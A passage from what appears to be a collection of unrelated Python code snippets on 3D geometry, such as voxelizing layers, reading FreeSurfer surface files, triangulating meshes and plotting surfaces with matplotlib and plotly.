0\t\t\t\t\t\n\t\t\t\t\tj.iternext()\n\t\t\tself.boolLayers.append(boolResult2)\n\t\t\tlayersR.append(tupleResultR)\n\t\t\tlayersG.append(tupleResultG)\n\t\t\tlayersB.append(tupleResultB)\n\t\t\tfor l in range(len(materials)):\n\t\t\t\tlayerMaterial[l].append(tupleMaterial[l])\n\t\t\t\t\n\t\tprint \"i got here\"\n\t\tself.volumeR=numpy.array(layersR) # create the 3d volume\n\t\tself.volumeG=numpy.array(layersG) \n\t\tself.volumeB=numpy.array(layersB)\n\t\t\n\t\tfor l in range(len(materials)):\n\t\t\tself.volumeComposition[l] = numpy.array(layerMaterial[l])\n\t\tvolumeGeneral.append(self.volumeR)\n\t\tvolumeGeneral.append(self.volumeG)\n\t\tvolumeGeneral.append(self.volumeB)\n\t\t\n\t\treturn volumeGeneral", "def tdim3(dim3):\n return TransformedDimension(Compose([], dim3.type), dim3)", "def get_all_object_triangles( filename, scale , translation=(0,0,0)):\n import warnings\n warnings.warn(\"@PendingDeprecationWarning\", PendingDeprecationWarning)\n vertexObjs = read_vertices_objects( filename )\n faceObjs = read_faces_objects( filename )\n\n r = []\n j = 0\n \n # Validation:\n vertices, faces = [],[]\n for obj in range(len(vertexObjs)):\n vertices += vertexObjs[obj]\n faces += faceObjs[obj]\n max_vertex_index = max([max(x) for x in faces])\n if len(vertices) != max_vertex_index:\n logging.warning( \"ParseWarning: A face's vertex index number is does not match the quantity of read vertices.\" )\n logging.warning( \"Qty of Vertices: \"+str(len(vertices))+\", Largest Face Index: \"+str(max_vertex_index) )\n\n # Parse as Tris:\n for obj in range(len(vertexObjs)):\n vertices = vertexObjs[obj]\n faces = faceObjs[obj]\n r.append([])\n c = 0\n for f in faces: # for every face\n for i in f: # for each index point in face\n c+=1\n try:\n # Get the face[i] vertex\n v = vertices[i-1]\n except IndexError as indErr:\n logging.warning(\"IndexError: Attempted to access index: \"+str(i-1)+\" in list of length: \"+str(len(vertices)))\n raise IndexError\n # Scale the face[i] vertex\n scV = [v[0]*scale, v[1]*scale, v[2]*scale]\n # Translate the scaled face vertex:\n t = translation\n tmpv = [scV[0]+t[0],scV[1]+t[1], scV[2]+t[2]]\n # Retain this vertex\n r[j].append(tmpv)\n # ---------------------\n if c % 3 == 0:\n j+=1\n r.append([])\n r = r[:len(r)-1] # remove the final empty list.\n\n checkShapeValidity( r )\n return r", "def visualize_in_3d(self,**kwargs):\n fig = plt.figure(figsize=(7,7))\n ax = fig.add_subplot(111, projection='3d')\n\n points = np.vstack([\n c.to_matrix() for c in self.contours if c.inclusion\n ])\n points[:,:2] = points[:,:2] * self.scan.pixel_spacing\n\n # Center the points at the origin for \n # spherical coordinates conversion.\n points = points - points.mean(axis=0)\n\n # Triangulate the azimuth and zenith transformation.\n azimuth = np.arctan2(points[:,1],points[:,0])\n zenith = np.arccos(points[:,2] / np.linalg.norm(points,axis=1))\n azi_zen = np.c_[azimuth.flatten(),zenith.flatten()]\n triangles = Delaunay(azi_zen).simplices\n\n # Start the points at 0 on every axis.\n # This lets the axis ticks to be interpreted as length in mm.\n points = points - points.min(axis=0)\n\n ax.set_xlabel('length (mm)')\n ax.set_ylabel('length (mm)')\n ax.set_zlabel('length (mm)')\n\n # Plot the points.\n ax.plot_trisurf(points[:,0], points[:,1], points[:,2],\n triangles=triangles, **kwargs)\n plt.show()", "def volume_tetrahedron(xyz, A, B, C, D):\n\n AD = xyz[A, :] - xyz[D, :]\n BD = xyz[B, :] - xyz[D, :]\n CD = xyz[C, :] - xyz[D, :]\n\n V = (\n (BD[:, 0] * CD[:, 1] - BD[:, 1] * CD[:, 0]) * AD[:, 2]\n - (BD[:, 0] * CD[:, 2] - BD[:, 2] * CD[:, 0]) * AD[:, 1]\n + (BD[:, 1] * CD[:, 2] - BD[:, 2] * CD[:, 1]) * AD[:, 0]\n )\n return V / 6", "def render_wireframe_3d(self, **kwds):\n wireframe = [];\n for l in self.lines:\n l_coords = self.coordinates_of(l)\n wireframe.append( line3d(l_coords, **kwds))\n for a in self.arrows:\n a_coords = self.coordinates_of(a)\n wireframe.append(arrow3d(a_coords[0], a_coords[1], **kwds))\n return sum(wireframe)", "def render_solid_3d(self, **kwds):\n return sum([ polygon3d(self.coordinates_of(f), **kwds) \n for f in self.polygons ])", "def get_triangles_per_vertex(my_core, native_ranges):\n\n t_p_v_data = []\n tri_dimension = 2\n for vertex in native_ranges[types.MBVERTEX]:\n t_p_v_data.append(my_core.get_adjacencies(vertex, tri_dimension).size())\n return np.array(t_p_v_data)", "def test_continuity_triangle_facet(degree, element, variant):\n elements = {}\n for cell in [basix.CellType.tetrahedron, basix.CellType.prism]: # , basix.CellType.pyramid]:\n try:\n elements[cell] = basix.create_element(element, cell, degree, *variant)\n except RuntimeError:\n pass\n\n if len(elements) <= 1:\n pytest.skip()\n\n facets = [\n [\n np.array([0, 0, 0]), np.array([1, 0, 0]), np.array([0, 1, 0]),\n {basix.CellType.tetrahedron: 3, basix.CellType.prism: 0}\n ], [\n np.array([0, 0, 0]), np.array([1, 0, 0]), np.array([0, 0, 1]),\n {basix.CellType.tetrahedron: 2, basix.CellType.pyramid: 1}\n ], [\n np.array([0, 0, 0]), np.array([0, 1, 0]), np.array([0, 0, 1]),\n {basix.CellType.tetrahedron: 1, basix.CellType.pyramid: 2}\n ],\n ]\n\n for v0, v1, v2, cellmap in facets:\n points = np.array([v0 + i/10 * (v1 - v0) + j/10 * (v2 - v0) for i in range(11) for j in range(11 - i)])\n\n data = None\n\n for c, e in elements.items():\n if c in cellmap:\n tab = e.tabulate(0, points)\n continuity_map = create_continuity_map_triangle(e.map_type, v0, v1, v2)\n entity_tab = [continuity_map(tab[:, :, i, :]) for i in e.entity_dofs[2][cellmap[c]]]\n if data is None:\n data = entity_tab\n else:\n assert np.allclose(data, entity_tab)", "def voxelize4(self, materials):\n\t\tlayers = list()\n\t\tlayersR = list()\n\t\tlayersG = list()\n\t\tlayersB = list()\n\t\t\n\t\tlayerMaterial = list()\n\t\tself.volumeComposition = list()\n\t\tfor l in range(len(materials)):\n\t\t\tlayerMaterial.append(list())\n\t\t\tself.volumeComposition.append(list())\n\n\t\tvolumeGeneral = list()\n\t\tm = 0\n\t\tfor i in self.slicePoints:\n\t\t\t#print self.boolResult[m].shape\n\t\t\ttupleResultR = numpy.zeros(self.boolLayers[m].shape, dtype=uint8)\n\t\t\ttupleResultG = numpy.zeros(self.boolLayers[m].shape, dtype=uint8)\n\t\t\ttupleResultB = numpy.zeros(self.boolLayers[m].shape, dtype=uint8)\n\t\t\ttupleMaterial = list()\n\t\t\tfor l in range(len(materials)):\n\t\t\t\ttupleMaterial.append(numpy.zeros(self.boolLayers[m].shape, dtype=float))\n\t\t\t\n\t\t\tj = numpy.nditer(self.boolLayers[m], flags=['multi_index'], op_flags=['readwrite'])\n\t\t\twhile not j.finished:\n\t\t\t\tif j[0] == True:\n\t\t\t\t#tupleResult[j.multi_index] = round((i[direction] - minValue) * ratio)\n\t\t\t\t#tupleResult[j.multi_index] = 78\n\t\t\t\t\tprint type(j.multi_index)\n\t\t\t\t\tprint j.multi_index\n\t\t\t\t\t#tupleResult[j.multi_index] = planeWeight * math.fabs((j.multi_index[1] - planeOrigin[0]) * planeNormal[0] + (j.multi_index[0] - planeOrigin[1]) * planeNormal[1] + (i[2] - planeOrigin[2]) * planeNormal[2]) + pointWeight * math.sqrt(math.pow((j.multi_index[1]- pointValue[0]),2) + math.pow((j.multi_index[0] - pointValue[1]), 2)+math.pow((i[2] - pointValue[2]),2))\n\t\t\t\t\t\n\t\t\t\t\tdistanceList = []\n\t\t\t\t\ttotalDistance = 0.0\n\t\t\t\t\tfor k in range(len(materials)):\n\t\t\t\t\t\tif materials[k].controlSourceType == \"Plane\":\n\t\t\t\t\t\t\tGplane = math.fabs((j.multi_index[1] - materials[k].origin[0]) * materials[k].normal[0] + (j.multi_index[0] - materials[k].origin[1]) * materials[k].normal[1] + (i[2] - materials[k].origin[2]) * materials[k].normal[2])\n\t\t\t\t\t\t\tdistanceList.append(Gplane)\n\t\t\t\t\t\t\ttotalDistance += Gplane\n\t\t\t\t\t\tif materials[k].controlSourceType == \"Point\":\n\t\t\t\t\t\t\tGpoint = (math.sqrt(math.pow((j.multi_index[1]- materials[k].point[0]),2) + math.pow((j.multi_index[0] - materials[k].point[1]), 2)+math.pow((i[2] - materials[k].point[2]),2)))\n\t\t\t\t\t\t\tdistanceList.append(Gpoint)\n\t\t\t\t\t\t\ttotalDistance += Gpoint\n\t\t\t\t\tfor k in range(len(distanceList)):\n\t\t\t\t\t\tdistanceList[k] = distanceList[k] / totalDistance\n\t\t\t\t\t\tdistanceList[k] = 1.0 - distanceList[k]\n\t\t\t\t\t\t\n\t\t\t\t\t\ttupleMaterial[k][j.multi_index] = distanceList[k]\n\t\t\t\t\t\t\n\t\t\t\t\t\ttupleResultR[j.multi_index] += materials[k].materialColor[0] * distanceList[k] * materials[k].weight\n\t\t\t\t\t\ttupleResultG[j.multi_index] += materials[k].materialColor[1] * distanceList[k] * materials[k].weight\n\t\t\t\t\t\ttupleResultB[j.multi_index] += materials[k].materialColor[2] * distanceList[k] * materials[k].weight\n\t\t\t\t\t#if(tupleResult[j.multi_index] > 0):\n\t\t\t\t\t#\ttupleResult[j.multi_index] = round(tupleResult[j.multi_index]) \n\t\t\t\t\t#if(tupleResult[j.multi_index] == 0):\n\t\t\t\t\t#\t\ttupleResult[j.multi_index] = 1\n\t\t\t\t\t#if(tupleResult[j.multi_index] < 0):\n\t\t\t\t\t#\ttupleResult[j.multi_index] = round(0 - tupleResult[j.multi_index]) \n\t\t\t\telse:\n\t\t\t\t\ttupleResultR[j.multi_index] = 0\n\t\t\t\t\ttupleResultG[j.multi_index] = 0\n\t\t\t\t\ttupleResultB[j.multi_index] = 0\n\t\t\t\t\tfor k in range(len(materials)):\n\t\t\t\t\t\ttupleMaterial[k][j.multi_index] = 0.0\n\t\t\t\tj.iternext()\n\t\t\tlayersR.append(tupleResultR)\n\t\t\tlayersG.append(tupleResultG)\n\t\t\tlayersB.append(tupleResultB)\n\t\t\tfor k in range(len(materials)):\n\t\t\t\tlayerMaterial[k].append(tupleMaterial[k])\n\t\t\t\t\n\t\t\tm = m + 1\n\t\tprint \"i got here\"\n\t\tvolumeR=numpy.array(layersR) # create the 3d volume\n\t\tvolumeG=numpy.array(layersG) \n\t\tvolumeB=numpy.array(layersB)\n\t\tfor k in range(len(materials)):\n\t\t\tself.volumeComposition[k] = numpy.array(layerMaterial[k])\n\t\t\n\t\tvolumeGeneral.append(volumeR)\n\t\tvolumeGeneral.append(volumeG)\n\t\tvolumeGeneral.append(volumeB)\n\t\treturn volumeGeneral", "def get_triangles(\n self,\n triangle_face_tol=0.01, # Tolerance between triangle and surface\n tol_relative_to_face=True, # The tolerance value is relative to the face size\n angle_tol_rads=0.1, # Angle between normals/tangents at triangle vertices\n ):\n ok = self.triangulate_all_faces(\n triangle_face_tol, tol_relative_to_face, angle_tol_rads\n )\n if not ok:\n # Failed to triangulate\n return None, None\n verts = []\n tris = []\n faces = self.faces()\n last_vert_index = 0\n for face in faces:\n fverts, ftris = face.get_triangles()\n verts.extend(fverts)\n for tri in ftris:\n new_indices = [index + last_vert_index for index in tri]\n tris.append(new_indices)\n last_vert_index = len(verts)\n return np.asarray(verts, dtype=np.float32), np.asarray(tris, dtype=np.int32)", "def get_volumes(self, dim):\n cdef np.ndarray[float64, mode='c', ndim=1] out\n\n if dim == 0:\n raise ValueError('vertices have no volume!')\n\n else:\n out = np.empty((self.mesh.topology.num[dim],),\n dtype=np.float64)\n mesh_get_volumes(self.mesh, &out[0], dim)\n\n return out", "def read_geometry(filepath, read_metadata=False, read_stamp=False):\n volume_info = OrderedDict()\n\n TRIANGLE_MAGIC = 16777214\n QUAD_MAGIC = 16777215\n NEW_QUAD_MAGIC = 16777213\n with open(filepath, \"rb\") as fobj:\n magic = _fread3(fobj)\n if magic in (QUAD_MAGIC, NEW_QUAD_MAGIC): # Quad file\n nvert = _fread3(fobj)\n nquad = _fread3(fobj)\n (fmt, div) = (\">i2\", 100.) if magic == QUAD_MAGIC else (\">f4\", 1.)\n coords = np.fromfile(fobj, fmt, nvert * 3).astype(np.float) / div\n coords = coords.reshape(-1, 3)\n quads = _fread3_many(fobj, nquad * 4)\n quads = quads.reshape(nquad, 4)\n #\n # Face splitting follows\n #\n faces = np.zeros((2 * nquad, 3), dtype=np.int)\n nface = 0\n for quad in quads:\n if (quad[0] % 2) == 0:\n faces[nface] = quad[0], quad[1], quad[3]\n nface += 1\n faces[nface] = quad[2], quad[3], quad[1]\n nface += 1\n else:\n faces[nface] = quad[0], quad[1], quad[2]\n nface += 1\n faces[nface] = quad[0], quad[2], quad[3]\n nface += 1\n\n elif magic == TRIANGLE_MAGIC: # Triangle file\n create_stamp = fobj.readline().rstrip(b'\\n').decode('utf-8')\n fobj.readline()\n vnum = np.fromfile(fobj, \">i4\", 1)[0]\n fnum = np.fromfile(fobj, \">i4\", 1)[0]\n coords = np.fromfile(fobj, \">f4\", vnum * 3).reshape(vnum, 3)\n faces = np.fromfile(fobj, \">i4\", fnum * 3).reshape(fnum, 3)\n\n if read_metadata:\n volume_info = _read_volume_info(fobj)\n else:\n raise ValueError(\"File does not appear to be a Freesurfer surface\")\n\n coords = coords.astype(np.float) # XXX: due to mayavi bug on mac 32bits\n\n ret = (coords, faces)\n if read_metadata:\n if len(volume_info) == 0:\n warnings.warn('No volume information contained in the file')\n ret += (volume_info,)\n if read_stamp:\n ret += (create_stamp,)\n\n return ret", "def D3(self, *args):\n return _Adaptor3d.Adaptor3d_Surface_D3(self, *args)", "def check_geometry(surface, space, donor=None, data_dir=None):\n\n if len(surface) != 2:\n raise TypeError('Must provide a tuple of geometry files')\n\n # fsaverage5, fsaverage6, etc\n if 'fsaverage' in space and space != 'fsaverage':\n space = 'fsaverage'\n space_opts = ('fsaverage', 'fsnative', 'fslr')\n if space not in space_opts:\n raise ValueError(f'Provided space must be one of {space_opts}.')\n if space == 'fsnative' and donor is None:\n raise ValueError('Specified space is \"fsnative\" but no donor ID '\n 'supplied')\n\n try:\n coords, triangles = map(list, zip(*[\n load_gifti(img).agg_data() for img in surface\n ]))\n except TypeError:\n coords, triangles = map(list, zip(*[i for i in surface]))\n\n triangles[-1] += coords[0].shape[0]\n coords, triangles = np.row_stack(coords), np.row_stack(triangles)\n\n if space == 'fsaverage':\n coords = transforms.fsaverage_to_mni152(coords)\n elif space == 'fsnative':\n coords = transforms.fsnative_to_xyz(coords, donor, data_dir=data_dir)\n\n return coords, triangles", "def get_mesh_boundary(triangles):\n # Create edges and sort each vertices on each edge.\n edge0 = triangles[:,0:2]\n edge1 = triangles[:,1:3]\n edge2 = triangles.take((0,2), axis=1)\n edges = np.concatenate((edge0, edge1, edge2), axis=0)\n edge_sort = np.sort(edges, axis=1)\n\n # Get unique edges that are only present once.\n (uniq, uniq_ids, counts) = np.unique(edge_sort, axis=0, return_index=True, return_counts=True)\n edge_inds = np.arange(edge_sort.shape[0], dtype=int)\n outer_edge_ids = edge_inds[np.in1d(edge_inds, uniq_ids[counts==1])]\n outer_edges = edge_sort[outer_edge_ids,:]\n num_outer_edges = outer_edges.shape[0]\n\n # Assume we need to close the polygon.\n num_outer_verts = num_outer_edges + 1\n\n # Loop over outer edges and use traversal method to get ordered vertices.\n v_start = outer_edges[0,0]\n v_end = outer_edges[0,1]\n vert_inds = -1*np.ones(num_outer_verts, dtype=int)\n vert_inds[0] = v_start\n vert_inds[1] = v_end\n vert_num = 2\n outer_edges[0,:] = -1\n for edge_num in range(1,num_outer_edges):\n edge_inds_next = np.where(outer_edges == v_end)\n if (edge_inds_next[0].shape[0] < 1):\n msg = \"Next edge not found for vertex %d\" % v_end\n raise ValueError(msg)\n edge_ind_next = edge_inds_next[0][0]\n vert_ind_next = 0\n if (edge_inds_next[1][0] == 0):\n vert_ind_next = 1\n vert_inds[vert_num] = outer_edges[edge_ind_next, vert_ind_next]\n outer_edges[edge_ind_next, :] = -1\n v_end = vert_inds[vert_num]\n vert_num += 1\n\n return vert_inds", "def plot_surface_3D(self, length = 30, fps = 30, **kwargs):\n fig = utils.get_figure(scale = 3)\n ax = fig.add_subplot(111, projection = '3d')\n\n # surface_x = self.xi_1_mesh\n # surface_y = self.xi_2_mesh\n # surface_x, surface_y, surface_z = self.surface()\n xyz = self.surface()\n\n # surface_x, surface_y = np.meshgrid(surface_x, surface_y)\n\n # print(np.shape(surface_x))\n # print(np.shape(surface_y))\n # print(np.shape(surface_z))\n\n control_points_x = np.array([control_point[0] for control_point in self.control_net.values()])\n control_points_y = np.array([control_point[1] for control_point in self.control_net.values()])\n control_points_z = np.array([control_point[2] for control_point in self.control_net.values()])\n\n # x_min = min(np.min(surface_x), np.min(control_points_x))\n # x_max = max(np.max(surface_x), np.max(control_points_x))\n # x_range = np.abs(x_max - x_min)\n #\n # y_min = min(np.min(surface_y), np.min(control_points_y))\n # y_max = max(np.max(surface_y), np.max(control_points_y))\n # y_range = np.abs(y_max - y_min)\n #\n # z_min = min(np.min(surface_z), np.min(control_points_z))\n # z_max = max(np.max(surface_z), np.max(control_points_z))\n # z_range = np.abs(z_max - z_min)\n #\n # ax.set_xlim(x_min - 0.05 * x_range, x_max + 0.05 * x_range)\n # ax.set_ylim(y_min - 0.05 * y_range, y_max + 0.05 * y_range)\n # ax.set_zlim(z_min - 0.05 * z_range, z_max + 0.05 * z_range)\n\n ax.scatter(control_points_x, control_points_y, control_points_z, depthshade = False, **CONTROL_POLYGON_KWARGS)\n\n # print(np.max(surface_x), np.max(surface_y), np.max(surface_z))\n # print(np.min(surface_x), np.min(surface_y), np.min(surface_z))\n # print(surface_x)\n # print(surface_y)\n # print(surface_z)\n xyz = np.reshape(xyz, (-1, 3))\n print(xyz.shape)\n x, y, z = xyz[:, 0], xyz[:, 1], xyz[:, 2]\n ax.scatter(x, y, z)\n # ax.plot_trisurf(\n # x, y, z,\n # cmap = plt.get_cmap('viridis'),\n # linewidth = 0,\n # antialiased = True,\n # )\n # ax.plot_surface(surface_x, surface_y, surface_z, rstride = 1, cstride = 1)\n # ax.plot_trisurf(surface_x, surface_y, surface_z)\n # ax.plot_trisurf(surface_x, surface_y, surface_z, **CURVE_KWARGS)\n\n ax.axis('off')\n\n ax.view_init(elev = 45, azim = 0) # note that this resets ax.dist to 10, so we can't use it below\n ax.dist = 7.5 # default is 10, so zoom in a little because there's no axis to take up the rest of the space\n\n plt.show()\n utils.save_current_figure(**kwargs)\n\n ### ANIMATION ###\n\n frames = length * fps\n\n writer = anim.writers['ffmpeg'](fps = fps, bitrate = 2000) # don't need a very high bitrate\n\n def animate(frame):\n print(frame, frames, frame / frames)\n ax.azim = 360 * frame / frames # one full rotation\n return [] # must return the list of artists we modified (i.e., nothing, since all we did is rotate the view)\n\n ani = anim.FuncAnimation(fig, animate, frames = frames, blit = True)\n ani.save(f\"{os.path.join(kwargs['target_dir'], kwargs['name'])}.mp4\", writer = writer)\n\n plt.close()", "def get3D_rod():\n\n volume = torch.zeros(1,1,55,54,53)\n length = 15\n st = [27,26,25]\n\n volume[:,:,st[0]:st[0]+length,st[1],st[2]] = 0.5\n volume[:,:,st[0]+length:st[0]+length+2,st[1],st[2]] = 0.2\n\n volume[:,:,st[0],st[1]:st[1]+length,st[2]] = 0.5\n volume[:,:,st[0],st[1]+length:st[1]+length+2,st[2]] = 1.\n \n volume[:,:,st[0],st[1],st[2]:st[2]+length] = 0.5\n volume[:,:,st[0],st[1],st[2]+length:st[2]+length+2] = 2.0\n \n volume[:,:,st[0],st[1]:st[1]+length,st[2]:st[2]+length] = 0.2\n volume[:,:,st[0],st[1]+length:st[1]+length+1,st[2]+length:st[2]+length+1] = 1.5\n\n return volume", "def three_dimensional(self, z): # Maybe I misunderstood the task. My method looks weird\n return (self.x, self.y, z)", "def get_num_vertices(triangles):\n return numpy.amax(numpy.reshape(triangles, -1)) + 1", "def surface_equ_3d_jit(polygon_surfaces):\n # return [a, b, c], d in ax+by+cz+d=0\n # polygon_surfaces: [num_polygon, num_surfaces, num_points_of_polygon, 3]\n surface_vec = polygon_surfaces[:, :, :2, :] - polygon_surfaces[:, :, 1:3, :]\n # normal_vec: [..., 3]\n normal_vec = np.cross(surface_vec[:, :, 0, :], surface_vec[:, :, 1, :])\n d = np.einsum('aij, aij->ai', normal_vec, polygon_surfaces[:, :, 0, :])\n return normal_vec, -d", "def cell_edges3d(self, axis2, axis3):\n shape = (self.size, axis2.size, axis3.size)\n vertices = np.zeros(shape).tolist()\n faces = np.zeros(shape).tolist()\n edge1 = self.cell_edges\n edge2 = axis2.cell_edges\n edge3 = axis3.cell_edges\n for i, row in enumerate(vertices):\n for j, col in enumerate(row):\n for k, _ in enumerate(col):\n vertices[i][j][k] = [\n (edge1[i], edge2[j], edge3[k]), (edge1[i + 1], edge2[j], edge3[k]),\n (edge1[i + 1], edge2[j + 1], edge3[k]), (edge1[i], edge2[j + 1], edge3[k]),\n (edge1[i], edge2[j], edge3[k + 1]), (edge1[i + 1], edge2[j], edge3[k + 1]),\n (edge1[i + 1], edge2[j + 1], edge3[k + 1]), (edge1[i], edge2[j + 1], edge3[k + 1])]\n faces[i][j][k] = [(0, 3, 2), (0, 2, 1), (4, 5, 6), (4, 6, 7),\n (2, 3, 7), (2, 7, 6), (4, 7, 3), (4, 3, 0),\n (0, 1, 5), (0, 5, 4), (1, 2, 6), (1, 6, 5)]\n return vertices, faces", "def get_triangles( self, N ):\n\n # store N as an instance variable\n self.N = N\n\n # initialize array to store locations of points for all triangles in the\n # tessellation sequence\n self.triangles = np.zeros( ( self.N, 3, 2 ) )\n\n # define points of the first triangle in the tessellation sequence\n point_c = np.array( [ 0, 0 ] )\n point_b = self.a * np.array( [ np.cos( self.C ), np.sin( self.C ) ] )\n point_a = np.array( [ self.b, 0 ] )\n\n # stack the points into a single array of shape (3, 2 )\n triangle = np.vstack( [ point_c, point_b, point_a ] )\n\n # loop over the number of triangles in the sequence\n for i in range( self.N ):\n\n # store the points of the i-th triangle in the array\n self.triangles[ i ] = triangle\n\n # compute the next triangle in the tessellation sequence\n triangle = self.next_triangle( triangle = triangle )\n\n # shift the next triangle in the tessellation sequence such that its\n # point C is in the same location as point B of the previous triangle\n triangle += ( self.triangles[ i - 1, 1 ] - self.triangles[ 0, 0 ] )", "def trisurf(\n x,\n y,\n z,\n simplices,\n show_colorbar,\n edges_color,\n scale,\n colormap=None,\n color_func=None,\n plot_edges=False,\n x_edge=None,\n y_edge=None,\n z_edge=None,\n facecolor=None,\n):\n # numpy import check\n if not np:\n raise ImportError(\"FigureFactory._trisurf() requires \" \"numpy imported.\")\n points3D = np.vstack((x, y, z)).T\n simplices = np.atleast_2d(simplices)\n\n # vertices of the surface triangles\n tri_vertices = points3D[simplices]\n\n # Define colors for the triangle faces\n if color_func is None:\n # mean values of z-coordinates of triangle vertices\n mean_dists = tri_vertices[:, :, 2].mean(-1)\n elif isinstance(color_func, (list, np.ndarray)):\n # Pre-computed list / array of values to map onto color\n if len(color_func) != len(simplices):\n raise ValueError(\n \"If color_func is a list/array, it must \"\n \"be the same length as simplices.\"\n )\n\n # convert all colors in color_func to rgb\n for index in range(len(color_func)):\n if isinstance(color_func[index], str):\n if \"#\" in color_func[index]:\n foo = clrs.hex_to_rgb(color_func[index])\n color_func[index] = clrs.label_rgb(foo)\n\n if isinstance(color_func[index], tuple):\n foo = clrs.convert_to_RGB_255(color_func[index])\n color_func[index] = clrs.label_rgb(foo)\n\n mean_dists = np.asarray(color_func)\n else:\n # apply user inputted function to calculate\n # custom coloring for triangle vertices\n mean_dists = []\n for triangle in tri_vertices:\n dists = []\n for vertex in triangle:\n dist = color_func(vertex[0], vertex[1], vertex[2])\n dists.append(dist)\n mean_dists.append(np.mean(dists))\n mean_dists = np.asarray(mean_dists)\n\n # Check if facecolors are already strings and can be skipped\n if isinstance(mean_dists[0], str):\n facecolor = mean_dists\n else:\n min_mean_dists = np.min(mean_dists)\n max_mean_dists = np.max(mean_dists)\n\n if facecolor is None:\n facecolor = []\n for index in range(len(mean_dists)):\n color = map_face2color(\n mean_dists[index], colormap, scale, min_mean_dists, max_mean_dists\n )\n facecolor.append(color)\n\n # Make sure facecolor is a list so output is consistent across Pythons\n facecolor = np.asarray(facecolor)\n ii, jj, kk = simplices.T\n\n triangles = graph_objs.Mesh3d(\n x=x, y=y, z=z, facecolor=facecolor, i=ii, j=jj, k=kk, name=\"\"\n )\n\n mean_dists_are_numbers = not isinstance(mean_dists[0], str)\n\n if mean_dists_are_numbers and show_colorbar is True:\n # make a colorscale from the colors\n colorscale = clrs.make_colorscale(colormap, scale)\n colorscale = clrs.convert_colorscale_to_rgb(colorscale)\n\n colorbar = graph_objs.Scatter3d(\n x=x[:1],\n y=y[:1],\n z=z[:1],\n mode=\"markers\",\n marker=dict(\n size=0.1,\n color=[min_mean_dists, max_mean_dists],\n colorscale=colorscale,\n showscale=True,\n ),\n hoverinfo=\"none\",\n showlegend=False,\n )\n\n # the triangle sides are not plotted\n if plot_edges is False:\n if mean_dists_are_numbers and show_colorbar is True:\n return [triangles, colorbar]\n else:\n return [triangles]\n\n # define the lists x_edge, y_edge and z_edge, of x, y, resp z\n # coordinates of edge end points for each triangle\n # None separates data corresponding to two consecutive triangles\n is_none = [ii is None for ii in [x_edge, y_edge, z_edge]]\n if any(is_none):\n if not all(is_none):\n raise ValueError(\n \"If any (x_edge, y_edge, z_edge) is None, \" \"all must be None\"\n )\n else:\n x_edge = []\n y_edge = []\n z_edge = []\n\n # Pull indices we care about, then add a None column to separate tris\n ixs_triangles = [0, 1, 2, 0]\n pull_edges = tri_vertices[:, ixs_triangles, :]\n x_edge_pull = np.hstack(\n [pull_edges[:, :, 0], np.tile(None, [pull_edges.shape[0], 1])]\n )\n y_edge_pull = np.hstack(\n [pull_edges[:, :, 1], np.tile(None, [pull_edges.shape[0], 1])]\n )\n z_edge_pull = np.hstack(\n [pull_edges[:, :, 2], np.tile(None, [pull_edges.shape[0], 1])]\n )\n\n # Now unravel the edges into a 1-d vector for plotting\n x_edge = np.hstack([x_edge, x_edge_pull.reshape([1, -1])[0]])\n y_edge = np.hstack([y_edge, y_edge_pull.reshape([1, -1])[0]])\n z_edge = np.hstack([z_edge, z_edge_pull.reshape([1, -1])[0]])\n\n if not (len(x_edge) == len(y_edge) == len(z_edge)):\n raise exceptions.PlotlyError(\n \"The lengths of x_edge, y_edge and \" \"z_edge are not the same.\"\n )\n\n # define the lines for plotting\n lines = graph_objs.Scatter3d(\n x=x_edge,\n y=y_edge,\n z=z_edge,\n mode=\"lines\",\n line=graph_objs.scatter3d.Line(color=edges_color, width=1.5),\n showlegend=False,\n )\n\n if mean_dists_are_numbers and show_colorbar is True:\n return [triangles, lines, colorbar]\n else:\n return [triangles, lines]", "def get_triangle(remote, objectid, triangleid):\n cmd1 = mmapi.StoredCommands()\n key1 = cmd1.AppendSceneCommand_GetTriangleIndices(objectid, triangleid)\n remote.runCommand(cmd1)\n t = mmapi.vec3i()\n cmd1.GetSceneCommandResult_GetTriangleIndices(key1, t)\n return (t.i, t.j, t.k)", "def get_volume_shape(self) -> Tuple[float, float, float]:\n image_shape = self.get_image_shape()\n if image_shape is not None:\n z = self.slice_array.get(\"lSize\", 0)\n return (*image_shape, z)", "def calc_surface(u, v):\n\n # # Wavy surface\n # surface = np.array([\n # u,\n # v,\n # np.exp(- (u**2 + v**2) / 30) * np.cos(np.sqrt(u**2 + v**2))\n # ])\n\n # Shere - {one_point}\n surface = np.array([\n 2 * u,\n 2 * v,\n 1 - u**2 - v**2\n ]) / (1 + u**2 + v**2)\n return (surface[0], surface[1], surface[2])", "def mesh_slice(V,n,X,Y,Z):\n from matplotlib import cm\n import mpl_toolkits.mplot3d.axes3d as p3\n import time\n order=np.array([(1,2,0),(2,0,1),(0,1,2)])\n q=np.transpose(V,(order[n])) # See projection for why we could also use take instead.\n if n==0: # Make a less cumbersome and more consistent version of this?\n i,j=X,Y\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n if n==1:\n i,j=Y,Z\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n if n==2:\n i,j=Z,X\n i,j=np.array([i]),np.array([j]).T\n I,J=i,j\n for m in range(j.shape[0]-1): # -1 because we already have the first row as I.\n I=np.vstack((I,i))\n for m in range(i.shape[1]-1):\n J=np.hstack((J,j))\n labels={\n 0:('horizontal axial (mm)','height (mm)'),\n 1:('horizontal radial (mm)','horizontal axial (mm)'),\n 2:('height (mm)','horizontal radial (mm)')\n } \n class animated(object): # 4D, plots f(x,y,z0) specific to mesh_slice.\n def __init__(self,I,J,q):\n self.fig = plt.figure()\n self.ax = self.fig.add_subplot(111, projection='3d')\n self.I,self.J=I,J\n self.q=q[:,0,:]\n self.surf=self.ax.plot_surface(self.J,self.I,self.q,cmap=cm.coolwarm,antialiased=False)\n def drawNow(self,ii,q,n):\n self.surf.remove()\n self.slc=q[:,ii,:]\n self.surf=self.ax.plot_surface(self.J,self.I,self.slc,cmap=cm.coolwarm,antialiased=False)\n plt.ylabel(labels[n][1])\n plt.xlabel(labels[n][0])\n #plt.title(ii) #Optional: this moves down during animation.\n plt.draw() # redraw the canvas\n time.sleep(0.01)\n self.fig.show()\n anim=animated(I,J,q)\n for ii in range(q.shape[1]):\n if ii==q.shape[1]-1:\n plt.title('Animation 